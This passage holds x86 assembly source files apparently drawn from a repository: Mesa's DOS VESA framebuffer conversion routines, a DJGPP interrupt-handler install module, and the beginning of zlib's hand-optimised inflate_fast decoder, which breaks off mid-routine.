addl %ebx, %edi
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
.p2align 5,,31
.global _vesa_b_dump_32_to_24
_vesa_b_dump_32_to_24:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi
shrl %cl, %edx
incl %ebp
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
movl $0x00FFFFFF, %ebx
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
pushl %ebx
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
popl %ebx
subl %ebp, %edi
.balign 4
2:
movb (%esi), %al /* XXX too many accesses */
incl %esi
rorl $8, %ebx
jnc 2b
movb %al, %fs:(%edi)
incl %edi
decl %ecx
jnz 1b
popl %ecx
popl %eax
addl _vl_current_delta, %edi
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_32_to_16
_vesa_b_dump_32_to_16:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi
shrl %cl, %edx
incl %ebp
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
subl %ebp, %edi
.balign 4
2:
movl (%esi), %eax
addl $4, %esi
CVT_32_TO_16(a, ebx)
movw %ax, %fs:(%edi)
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ecx
popl %eax
addl _vl_current_delta, %edi
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_32_to_15
_vesa_b_dump_32_to_15:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi
shrl %cl, %edx
incl %ebp
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
subl %ebp, %edi
.balign 4
2:
movl (%esi), %eax
addl $4, %esi
CVT_32_TO_15(a, ebx)
movw %ax, %fs:(%edi)
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ecx
popl %eax
addl _vl_current_delta, %edi
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_32_to_8
_vesa_b_dump_32_to_8:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi
shrl %cl, %edx
incl %ebp
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
.balign 4
0:
pushl %eax
pushl %ecx
pushl %edx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
popl %edx
incl %edx
pushl %edx
xorl %ebx, %ebx
call *_vesa_swbank
subl %ebp, %edi
.balign 4
2:
movl (%esi), %eax
addl $4, %esi
#if 1
xorl %ebx, %ebx
movl %eax, %edx
movb %ah, %bl
shrl $16, %edx
andl $0xFF, %edx
andl $0xFF, %eax
movb _array_b(%eax), %al
movb _array_r(%edx), %dl
movb _array_g(%ebx), %bl
imull $36, %eax
imull $6, %ebx
addl %edx, %eax
addl %ebx, %eax
#endif
movb %al, %fs:(%edi)
incl %edi
decl %ecx
jnz 1b
popl %edx
popl %ecx
popl %eax
addl _vl_current_delta, %edi
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_24_to_32
_vesa_b_dump_24_to_32:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi
shrl %cl, %edx
incl %ebp
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
pushl %ebx
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
popl %ebx
subl %ebp, %edi
.balign 4
2:
movl (%esi), %eax
addl $3, %esi
movl %eax, %fs:(%edi)
addl $4, %edi
subl $4, %ecx
jnz 1b
popl %ecx
popl %eax
addl %ebx, %edi
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_24_to_8
_vesa_b_dump_24_to_8:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi
shrl %cl, %edx
incl %ebp
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
.balign 4
0:
pushl %eax
pushl %ecx
pushl %edx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
popl %edx
incl %edx
pushl %edx
xorl %ebx, %ebx
call *_vesa_swbank
subl %ebp, %edi
.balign 4
2:
movl (%esi), %eax
addl $3, %esi
#if 1
xorl %ebx, %ebx
movl %eax, %edx
movb %ah, %bl
shrl $16, %edx
andl $0xFF, %edx
andl $0xFF, %eax
movb _array_b(%eax), %al
movb _array_r(%edx), %dl
movb _array_g(%ebx), %bl
imull $36, %eax
imull $6, %ebx
addl %edx, %eax
addl %ebx, %eax
#endif
movb %al, %fs:(%edi)
incl %edi
decl %ecx
jnz 1b
popl %edx
popl %ecx
popl %eax
addl _vl_current_delta, %edi
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_16_to_15
_vesa_b_dump_16_to_15:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi
shrl %cl, %edx
incl %ebp
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
subl %ebp, %edi
.balign 4
2:
movw (%esi), %ax
addl $2, %esi
CVT_16_TO_15(eax, ebx)
movw %ax, %fs:(%edi)
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ecx
popl %eax
addl _vl_current_delta, %edi
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_16_to_8
_vesa_b_dump_16_to_8:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi
shrl %cl, %edx
incl %ebp
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
pushl %ebx
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
popl %ebx
subl %ebp, %edi
.balign 4
2:
movw (%esi), %ax
addl $2, %esi
#if 1
andl $0xFFFF, %eax
movb _tab_16_8(%eax), %al
#endif
movb %al, %fs:(%edi)
addl $1, %edi
subl $1, %ecx
jnz 1b
popl %ecx
popl %eax
addl %ebx, %edi
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
|
AIFM-sys/AIFM
| 3,173
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/glut/dos/PC_HW/pc_irq.S
|
/*
* PC/HW routine collection v1.3 for DOS/DJGPP
*
* Copyright (C) 2002 - Daniel Borca
* Email : dborca@yahoo.com
* Web : http://www.geocities.com/dborca
*/
.file "pc_irq.S"
.text
#define IRQ_STACK_SIZE 16384
#define IRQ_WRAPPER_LEN (__irq_wrapper_1-__irq_wrapper_0)
#define IRQ_OLD (__irq_old_0-__irq_wrapper_0)
#define IRQ_HOOK (__irq_hook_0-__irq_wrapper_0)
#define IRQ_STACK (__irq_stack_0-__irq_wrapper_0)
.balign 4
common:
movw $0x0400, %ax
int $0x31
movl %ss:8(%ebp), %ebx
cmpl $15, %ebx
jbe 0f
fail:
orl $-1, %eax
popl %edi
popl %ebx
leave
ret
0:
movl %ebx, %edi
imull $IRQ_WRAPPER_LEN, %edi
addl $__irq_wrapper_0, %edi
cmpb $7, %bl
jbe 1f
movb %dl, %dh
subb $8, %dh
1:
addb %dh, %bl
ret
.balign 4
.global _pc_install_irq
_pc_install_irq:
pushl %ebp
movl %esp, %ebp
pushl %ebx
pushl %edi
call common
cmpl $0, IRQ_HOOK(%edi)
jne fail
pushl $IRQ_WRAPPER_LEN
pushl %edi
call __go32_dpmi_lock_code
addl $8, %esp
testl %eax, %eax
jnz fail
pushl $IRQ_STACK_SIZE
call _pc_malloc
popl %edx
testl %eax, %eax
jz fail
addl %edx, %eax
movl %eax, IRQ_STACK(%edi)
movl ___djgpp_ds_alias, %eax
movl %eax, IRQ_STACK+4(%edi)
movl %ss:12(%ebp), %eax
movl %eax, IRQ_HOOK(%edi)
movw $0x0204, %ax
int $0x31
movl %edx, IRQ_OLD(%edi)
movw %cx, IRQ_OLD+4(%edi)
movw $0x0205, %ax
movl %edi, %edx
movl %cs, %ecx
int $0x31
done:
xorl %eax, %eax
popl %edi
popl %ebx
leave
ret
.balign 4
.global _pc_remove_irq
_pc_remove_irq:
pushl %ebp
movl %esp, %ebp
pushl %ebx
pushl %edi
call common
cmpl $0, IRQ_HOOK(%edi)
je fail
movl $0, IRQ_HOOK(%edi)
movw $0x0205, %ax
movl IRQ_OLD(%edi), %edx
movl IRQ_OLD+4(%edi), %ecx
int $0x31
movl IRQ_STACK(%edi), %eax
subl $IRQ_STACK_SIZE, %eax
pushl %eax
call _free
popl %eax
jmp done
#define WRAPPER(x) ; \
.balign 4 ; \
__irq_wrapper_##x: ; \
pushal ; \
pushl %ds ; \
pushl %es ; \
pushl %fs ; \
pushl %gs ; \
movl %ss, %ebx ; \
movl %esp, %esi ; \
lss %cs:__irq_stack_##x, %esp ; \
pushl %ss ; \
pushl %ss ; \
popl %es ; \
popl %ds ; \
movl ___djgpp_dos_sel, %fs ; \
pushl %fs ; \
popl %gs ; \
call *__irq_hook_##x ; \
movl %ebx, %ss ; \
movl %esi, %esp ; \
testl %eax, %eax ; \
popl %gs ; \
popl %fs ; \
popl %es ; \
popl %ds ; \
popal ; \
jz __irq_ignore_##x ; \
__irq_bypass_##x: ; \
ljmp *%cs:__irq_old_##x ; \
__irq_ignore_##x: ; \
iret ; \
.balign 4 ; \
__irq_old_##x: ; \
.long 0, 0 ; \
__irq_hook_##x: ; \
.long 0 ; \
__irq_stack_##x: ; \
.long 0, 0
WRAPPER(0);
WRAPPER(1);
WRAPPER(2);
WRAPPER(3);
WRAPPER(4);
WRAPPER(5);
WRAPPER(6);
WRAPPER(7);
WRAPPER(8);
WRAPPER(9);
WRAPPER(10);
WRAPPER(11);
WRAPPER(12);
WRAPPER(13);
WRAPPER(14);
WRAPPER(15);
|
AIFM-sys/AIFM
| 42,842
|
shenango/apps/parsec/pkgs/libs/zlib/src/contrib/inflate86/inffast.S
|
/*
* inffast.S is a hand tuned assembler version of:
*
* inffast.c -- fast decoding
* Copyright (C) 1995-2003 Mark Adler
* For conditions of distribution and use, see copyright notice in zlib.h
*
* Copyright (C) 2003 Chris Anderson <christop@charm.net>
* Please use the copyright conditions above.
*
* This version (Jan-23-2003) of inflate_fast was coded and tested under
* GNU/Linux on a pentium 3, using the gcc-3.2 compiler distribution. On that
* machine, I found that gzip style archives decompressed about 20% faster than
* the gcc-3.2 -O3 -fomit-frame-pointer compiled version. Your results will
* depend on how large of a buffer is used for z_stream.next_in & next_out
* (8K-32K worked best for my 256K cpu cache) and how much overhead there is in
* stream processing I/O and crc32/addler32. In my case, this routine used
* 70% of the cpu time and crc32 used 20%.
*
* I am confident that this version will work in the general case, but I have
* not tested a wide variety of datasets or a wide variety of platforms.
*
* Jan-24-2003 -- Added -DUSE_MMX define for slightly faster inflating.
* It should be a runtime flag instead of compile time flag...
*
* Jan-26-2003 -- Added runtime check for MMX support with cpuid instruction.
* With -DUSE_MMX, only MMX code is compiled. With -DNO_MMX, only non-MMX code
* is compiled. Without either option, runtime detection is enabled. Runtime
* detection should work on all modern cpus and the recomended algorithm (flip
* ID bit on eflags and then use the cpuid instruction) is used in many
* multimedia applications. Tested under win2k with gcc-2.95 and gas-2.12
* distributed with cygwin3. Compiling with gcc-2.95 -c inffast.S -o
* inffast.obj generates a COFF object which can then be linked with MSVC++
* compiled code. Tested under FreeBSD 4.7 with gcc-2.95.
*
* Jan-28-2003 -- Tested Athlon XP... MMX mode is slower than no MMX (and
* slower than compiler generated code). Adjusted cpuid check to use the MMX
* code only for Pentiums < P4 until I have more data on the P4. Speed
* improvment is only about 15% on the Athlon when compared with code generated
* with MSVC++. Not sure yet, but I think the P4 will also be slower using the
* MMX mode because many of it's x86 ALU instructions execute in .5 cycles and
* have less latency than MMX ops. Added code to buffer the last 11 bytes of
* the input stream since the MMX code grabs bits in chunks of 32, which
* differs from the inffast.c algorithm. I don't think there would have been
* read overruns where a page boundary was crossed (a segfault), but there
* could have been overruns when next_in ends on unaligned memory (unintialized
* memory read).
*
* Mar-13-2003 -- P4 MMX is slightly slower than P4 NO_MMX. I created a C
* version of the non-MMX code so that it doesn't depend on zstrm and zstate
* structure offsets which are hard coded in this file. This was last tested
* with zlib-1.2.0 which is currently in beta testing, newer versions of this
* and inffas86.c can be found at http://www.eetbeetee.com/zlib/ and
* http://www.charm.net/~christop/zlib/
*/
/*
* if you have underscore linking problems (_inflate_fast undefined), try
* using -DGAS_COFF
*/
#if ! defined( GAS_COFF ) && ! defined( GAS_ELF )
#if defined( WIN32 ) || defined( __CYGWIN__ )
#define GAS_COFF /* windows object format */
#else
#define GAS_ELF
#endif
#endif /* ! GAS_COFF && ! GAS_ELF */
#if defined( GAS_COFF )
/* coff externals have underscores */
#define inflate_fast _inflate_fast
#define inflate_fast_use_mmx _inflate_fast_use_mmx
#endif /* GAS_COFF */
.file "inffast.S"
.globl inflate_fast
.text
.align 4,0
.L_invalid_literal_length_code_msg:
.string "invalid literal/length code"
.align 4,0
.L_invalid_distance_code_msg:
.string "invalid distance code"
.align 4,0
.L_invalid_distance_too_far_msg:
.string "invalid distance too far back"
#if ! defined( NO_MMX )
.align 4,0
.L_mask: /* mask[N] = ( 1 << N ) - 1 */
.long 0
.long 1
.long 3
.long 7
.long 15
.long 31
.long 63
.long 127
.long 255
.long 511
.long 1023
.long 2047
.long 4095
.long 8191
.long 16383
.long 32767
.long 65535
.long 131071
.long 262143
.long 524287
.long 1048575
.long 2097151
.long 4194303
.long 8388607
.long 16777215
.long 33554431
.long 67108863
.long 134217727
.long 268435455
.long 536870911
.long 1073741823
.long 2147483647
.long 4294967295
#endif /* NO_MMX */
.text
/*
* struct z_stream offsets, in zlib.h
*/
#define next_in_strm 0 /* strm->next_in */
#define avail_in_strm 4 /* strm->avail_in */
#define next_out_strm 12 /* strm->next_out */
#define avail_out_strm 16 /* strm->avail_out */
#define msg_strm 24 /* strm->msg */
#define state_strm 28 /* strm->state */
/*
* struct inflate_state offsets, in inflate.h
*/
#define mode_state 0 /* state->mode */
#define wsize_state 32 /* state->wsize */
#define write_state 40 /* state->write */
#define window_state 44 /* state->window */
#define hold_state 48 /* state->hold */
#define bits_state 52 /* state->bits */
#define lencode_state 68 /* state->lencode */
#define distcode_state 72 /* state->distcode */
#define lenbits_state 76 /* state->lenbits */
#define distbits_state 80 /* state->distbits */
/*
* inflate_fast's activation record
*/
#define local_var_size 64 /* how much local space for vars */
#define strm_sp 88 /* first arg: z_stream * (local_var_size + 24) */
#define start_sp 92 /* second arg: unsigned int (local_var_size + 28) */
/*
* offsets for local vars on stack
*/
#define out 60 /* unsigned char* */
#define window 56 /* unsigned char* */
#define wsize 52 /* unsigned int */
#define write 48 /* unsigned int */
#define in 44 /* unsigned char* */
#define beg 40 /* unsigned char* */
#define buf 28 /* char[ 12 ] */
#define len 24 /* unsigned int */
#define last 20 /* unsigned char* */
#define end 16 /* unsigned char* */
#define dcode 12 /* code* */
#define lcode 8 /* code* */
#define dmask 4 /* unsigned int */
#define lmask 0 /* unsigned int */
/*
* typedef enum inflate_mode consts, in inflate.h
*/
#define INFLATE_MODE_TYPE 11 /* state->mode flags enum-ed in inflate.h */
#define INFLATE_MODE_BAD 26
#if ! defined( USE_MMX ) && ! defined( NO_MMX )
#define RUN_TIME_MMX
#define CHECK_MMX 1
#define DO_USE_MMX 2
#define DONT_USE_MMX 3
.globl inflate_fast_use_mmx
.data
.align 4,0
inflate_fast_use_mmx: /* integer flag for run time control 1=check,2=mmx,3=no */
.long CHECK_MMX
#if defined( GAS_ELF )
/* elf info */
.type inflate_fast_use_mmx,@object
.size inflate_fast_use_mmx,4
#endif
#endif /* RUN_TIME_MMX */
#if defined( GAS_COFF )
/* coff info: scl 2 = extern, type 32 = function */
.def inflate_fast; .scl 2; .type 32; .endef
#endif
.text
.align 32,0x90
inflate_fast:
pushl %edi
pushl %esi
pushl %ebp
pushl %ebx
pushf /* save eflags (strm_sp, state_sp assumes this is 32 bits) */
subl $local_var_size, %esp
cld
#define strm_r %esi
#define state_r %edi
movl strm_sp(%esp), strm_r
movl state_strm(strm_r), state_r
/* in = strm->next_in;
* out = strm->next_out;
* last = in + strm->avail_in - 11;
* beg = out - (start - strm->avail_out);
* end = out + (strm->avail_out - 257);
*/
movl avail_in_strm(strm_r), %edx
movl next_in_strm(strm_r), %eax
addl %eax, %edx /* avail_in += next_in */
subl $11, %edx /* avail_in -= 11 */
movl %eax, in(%esp)
movl %edx, last(%esp)
movl start_sp(%esp), %ebp
movl avail_out_strm(strm_r), %ecx
movl next_out_strm(strm_r), %ebx
subl %ecx, %ebp /* start -= avail_out */
negl %ebp /* start = -start */
addl %ebx, %ebp /* start += next_out */
subl $257, %ecx /* avail_out -= 257 */
addl %ebx, %ecx /* avail_out += out */
movl %ebx, out(%esp)
movl %ebp, beg(%esp)
movl %ecx, end(%esp)
/* wsize = state->wsize;
* write = state->write;
* window = state->window;
* hold = state->hold;
* bits = state->bits;
* lcode = state->lencode;
* dcode = state->distcode;
* lmask = ( 1 << state->lenbits ) - 1;
* dmask = ( 1 << state->distbits ) - 1;
*/
movl lencode_state(state_r), %eax
movl distcode_state(state_r), %ecx
movl %eax, lcode(%esp)
movl %ecx, dcode(%esp)
movl $1, %eax
movl lenbits_state(state_r), %ecx
shll %cl, %eax
decl %eax
movl %eax, lmask(%esp)
movl $1, %eax
movl distbits_state(state_r), %ecx
shll %cl, %eax
decl %eax
movl %eax, dmask(%esp)
movl wsize_state(state_r), %eax
movl write_state(state_r), %ecx
movl window_state(state_r), %edx
movl %eax, wsize(%esp)
movl %ecx, write(%esp)
movl %edx, window(%esp)
movl hold_state(state_r), %ebp
movl bits_state(state_r), %ebx
#undef strm_r
#undef state_r
#define in_r %esi
#define from_r %esi
#define out_r %edi
movl in(%esp), in_r
movl last(%esp), %ecx
cmpl in_r, %ecx
ja .L_align_long /* if in < last */
addl $11, %ecx /* ecx = &in[ avail_in ] */
subl in_r, %ecx /* ecx = avail_in */
movl $12, %eax
subl %ecx, %eax /* eax = 12 - avail_in */
leal buf(%esp), %edi
rep movsb /* memcpy( buf, in, avail_in ) */
movl %eax, %ecx
xorl %eax, %eax
rep stosb /* memset( &buf[ avail_in ], 0, 12 - avail_in ) */
leal buf(%esp), in_r /* in = buf */
movl in_r, last(%esp) /* last = in, do just one iteration */
jmp .L_is_aligned
/* align in_r on long boundary */
.L_align_long:
testl $3, in_r
jz .L_is_aligned
xorl %eax, %eax
movb (in_r), %al
incl in_r
movl %ebx, %ecx
addl $8, %ebx
shll %cl, %eax
orl %eax, %ebp
jmp .L_align_long
.L_is_aligned:
movl out(%esp), out_r
#if defined( NO_MMX )
jmp .L_do_loop
#endif
#if defined( USE_MMX )
jmp .L_init_mmx
#endif
/*** Runtime MMX check ***/
#if defined( RUN_TIME_MMX )
.L_check_mmx:
cmpl $DO_USE_MMX, inflate_fast_use_mmx
je .L_init_mmx
ja .L_do_loop /* > 2 */
pushl %eax
pushl %ebx
pushl %ecx
pushl %edx
pushf
movl (%esp), %eax /* copy eflags to eax */
xorl $0x200000, (%esp) /* try toggling ID bit of eflags (bit 21)
* to see if cpu supports cpuid...
* ID bit method not supported by NexGen but
* bios may load a cpuid instruction and
* cpuid may be disabled on Cyrix 5-6x86 */
popf
pushf
popl %edx /* copy new eflags to edx */
xorl %eax, %edx /* test if ID bit is flipped */
jz .L_dont_use_mmx /* not flipped if zero */
xorl %eax, %eax
cpuid
cmpl $0x756e6547, %ebx /* check for GenuineIntel in ebx,ecx,edx */
jne .L_dont_use_mmx
cmpl $0x6c65746e, %ecx
jne .L_dont_use_mmx
cmpl $0x49656e69, %edx
jne .L_dont_use_mmx
movl $1, %eax
cpuid /* get cpu features */
shrl $8, %eax
andl $15, %eax
cmpl $6, %eax /* check for Pentium family, is 0xf for P4 */
jne .L_dont_use_mmx
testl $0x800000, %edx /* test if MMX feature is set (bit 23) */
jnz .L_use_mmx
jmp .L_dont_use_mmx
.L_use_mmx:
movl $DO_USE_MMX, inflate_fast_use_mmx
jmp .L_check_mmx_pop
.L_dont_use_mmx:
movl $DONT_USE_MMX, inflate_fast_use_mmx
.L_check_mmx_pop:
popl %edx
popl %ecx
popl %ebx
popl %eax
jmp .L_check_mmx
#endif
/*** Non-MMX code ***/
#if defined ( NO_MMX ) || defined( RUN_TIME_MMX )
#define hold_r %ebp
#define bits_r %bl
#define bitslong_r %ebx
.align 32,0x90
.L_while_test:
/* while (in < last && out < end)
*/
cmpl out_r, end(%esp)
jbe .L_break_loop /* if (out >= end) */
cmpl in_r, last(%esp)
jbe .L_break_loop
.L_do_loop:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out
*
* do {
* if (bits < 15) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* this = lcode[hold & lmask]
*/
cmpb $15, bits_r
ja .L_get_length_code /* if (15 < bits) */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
.L_get_length_code:
movl lmask(%esp), %edx /* edx = lmask */
movl lcode(%esp), %ecx /* ecx = lcode */
andl hold_r, %edx /* edx &= hold */
movl (%ecx,%edx,4), %eax /* eax = lcode[hold & lmask] */
.L_dolen:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out
*
* dolen:
* bits -= this.bits;
* hold >>= this.bits
*/
movb %ah, %cl /* cl = this.bits */
subb %ah, bits_r /* bits -= this.bits */
shrl %cl, hold_r /* hold >>= this.bits */
/* check if op is a literal
* if (op == 0) {
* PUP(out) = this.val;
* }
*/
testb %al, %al
jnz .L_test_for_length_base /* if (op != 0) 45.7% */
shrl $16, %eax /* output this.val char */
stosb
jmp .L_while_test
.L_test_for_length_base:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out, %edx = len
*
* else if (op & 16) {
* len = this.val
* op &= 15
* if (op) {
* if (op > bits) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* len += hold & mask[op];
* bits -= op;
* hold >>= op;
* }
*/
#define len_r %edx
movl %eax, len_r /* len = this */
shrl $16, len_r /* len = this.val */
movb %al, %cl
testb $16, %al
jz .L_test_for_second_level_length /* if ((op & 16) == 0) 8% */
andb $15, %cl /* op &= 15 */
jz .L_save_len /* if (!op) */
cmpb %cl, bits_r
jae .L_add_bits_to_len /* if (op <= bits) */
movb %cl, %ch /* stash op in ch, freeing cl */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
movb %ch, %cl /* move op back to ecx */
.L_add_bits_to_len:
movl $1, %eax
shll %cl, %eax
decl %eax
subb %cl, bits_r
andl hold_r, %eax /* eax &= hold */
shrl %cl, hold_r
addl %eax, len_r /* len += hold & mask[op] */
.L_save_len:
movl len_r, len(%esp) /* save len */
#undef len_r
.L_decode_distance:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out, %edx = dist
*
* if (bits < 15) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* this = dcode[hold & dmask];
* dodist:
* bits -= this.bits;
* hold >>= this.bits;
* op = this.op;
*/
cmpb $15, bits_r
ja .L_get_distance_code /* if (15 < bits) */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
.L_get_distance_code:
movl dmask(%esp), %edx /* edx = dmask */
movl dcode(%esp), %ecx /* ecx = dcode */
andl hold_r, %edx /* edx &= hold */
movl (%ecx,%edx,4), %eax /* eax = dcode[hold & dmask] */
#define dist_r %edx
.L_dodist:
movl %eax, dist_r /* dist = this */
shrl $16, dist_r /* dist = this.val */
movb %ah, %cl
subb %ah, bits_r /* bits -= this.bits */
shrl %cl, hold_r /* hold >>= this.bits */
/* if (op & 16) {
* dist = this.val
* op &= 15
* if (op > bits) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* dist += hold & mask[op];
* bits -= op;
* hold >>= op;
*/
movb %al, %cl /* cl = this.op */
testb $16, %al /* if ((op & 16) == 0) */
jz .L_test_for_second_level_dist
andb $15, %cl /* op &= 15 */
jz .L_check_dist_one
cmpb %cl, bits_r
jae .L_add_bits_to_dist /* if (op <= bits) 97.6% */
movb %cl, %ch /* stash op in ch, freeing cl */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
movb %ch, %cl /* move op back to ecx */
.L_add_bits_to_dist:
movl $1, %eax
shll %cl, %eax
decl %eax /* (1 << op) - 1 */
subb %cl, bits_r
andl hold_r, %eax /* eax &= hold */
shrl %cl, hold_r
addl %eax, dist_r /* dist += hold & ((1 << op) - 1) */
jmp .L_check_window
.L_check_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes
*
* nbytes = out - beg;
* if (dist <= nbytes) {
* from = out - dist;
* do {
* PUP(out) = PUP(from);
* } while (--len > 0) {
* }
*/
movl in_r, in(%esp) /* save in so from can use it's reg */
movl out_r, %eax
subl beg(%esp), %eax /* nbytes = out - beg */
cmpl dist_r, %eax
jb .L_clip_window /* if (dist > nbytes) 4.2% */
movl len(%esp), %ecx
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
subl $3, %ecx
movb (from_r), %al
movb %al, (out_r)
movb 1(from_r), %al
movb 2(from_r), %dl
addl $3, from_r
movb %al, 1(out_r)
movb %dl, 2(out_r)
addl $3, out_r
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
jmp .L_while_test
.align 16,0x90
.L_check_dist_one:
cmpl $1, dist_r
jne .L_check_window
cmpl out_r, beg(%esp)
je .L_check_window
decl out_r
movl len(%esp), %ecx
movb (out_r), %al
subl $3, %ecx
movb %al, 1(out_r)
movb %al, 2(out_r)
movb %al, 3(out_r)
addl $4, out_r
rep stosb
jmp .L_while_test
.align 16,0x90
.L_test_for_second_level_length:
/* else if ((op & 64) == 0) {
* this = lcode[this.val + (hold & mask[op])];
* }
*/
testb $64, %al
jnz .L_test_for_end_of_block /* if ((op & 64) != 0) */
movl $1, %eax
shll %cl, %eax
decl %eax
andl hold_r, %eax /* eax &= hold */
addl %edx, %eax /* eax += this.val */
movl lcode(%esp), %edx /* edx = lcode */
movl (%edx,%eax,4), %eax /* eax = lcode[val + (hold&mask[op])] */
jmp .L_dolen
.align 16,0x90
.L_test_for_second_level_dist:
/* else if ((op & 64) == 0) {
